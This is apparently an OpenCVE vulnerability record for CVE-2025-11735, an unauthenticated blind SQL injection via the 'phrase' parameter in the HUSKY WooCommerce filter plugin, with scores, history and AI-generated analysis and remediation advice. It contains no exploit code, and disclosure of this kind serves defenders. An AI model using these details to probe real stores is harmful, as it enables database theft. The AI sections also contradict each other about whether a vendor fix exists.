Description
The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to blind SQL Injection via the `phrase` parameter in all versions up to, and including, 1.3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Published: 2025-10-28
Score: 7.5 High
EPSS: < 1% Very Low
KEV: No
Impact: Blind SQL Injection
Action: Immediate Patch
AI Analysis

Impact

The HUSKY – Products Filter Professional for WooCommerce plugin is vulnerable to blind SQL Injection through the phrase parameter. The flaw stems from inadequate escaping and a lack of prepared statements, which allows an attacker to append malicious SQL fragments to the existing query. This can lead to the extraction of sensitive database content by unauthenticated users, compromising confidentiality and potentially allowing further exploitation.

Affected Systems

The vulnerability affects the HUSKY – Products Filter Professional for WooCommerce plugin for WordPress, with all releases up to and including version 1.3.7.1. The plugin is distributed by realmag777.

Risk and Exploitability

The issue carries a CVSS score of 7.5, indicating a considerable threat. The EPSS score of < 1 % reflects a very low, but non‑zero, probability of exploitation in the wild, and the vulnerability is not listed in the CISA KEV catalog. The expected attack vector is through unauthenticated HTTP requests to the plugin’s filtering endpoint, where an attacker can supply a crafted phrase parameter. Successful exploitation results in information disclosure via blind injection, requiring repeated requests to infer the data.

Generated by OpenCVE AI on April 21, 2026 at 02:02 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the HUSKY – Products Filter Professional for WooCommerce plugin to a version newer than 1.3.7.1, or apply the vendor’s published patch.
  • If an update is impossible, block or sandbox the phrase parameter by configuring web application firewall rules or by limiting access to the filtering feature through server or WordPress permissions.
  • Monitor database activity for anomalous queries or unauthorized data access and review logs for patterns consistent with blind SQL injection attempts.

Generated by OpenCVE AI on April 21, 2026 at 02:02 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 28 Oct 2025 14:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 28 Oct 2025 10:30:00 +0000

Type Values Removed Values Added
First Time appeared Realmag777
Realmag777 husky
Wordpress
Wordpress wordpress
Vendors & Products Realmag777
Realmag777 husky
Wordpress
Wordpress wordpress

Tue, 28 Oct 2025 05:45:00 +0000

Type Values Removed Values Added
Description The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to blind SQL Injection via the `phrase` parameter in all versions up to, and including, 1.3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Title HUSKY – Products Filter Professional for WooCommerce <= 1.3.7.1 - Unauthenticated SQL Injection via `phrase` Parameter
Weaknesses CWE-89
References
Metrics cvssV3_1

{'score': 7.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}

Subscriptions

Realmag777 Husky
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T17:31:16.039Z

Reserved: 2025-10-14T10:35:20.889Z

Link: CVE-2025-11735

cve-icon Vulnrichment

Updated: 2025-10-28T13:32:53.331Z

cve-icon NVD

Status : Deferred

Published: 2025-10-28T06:15:39.487

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-11735

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-21T02:15:06Z

Weaknesses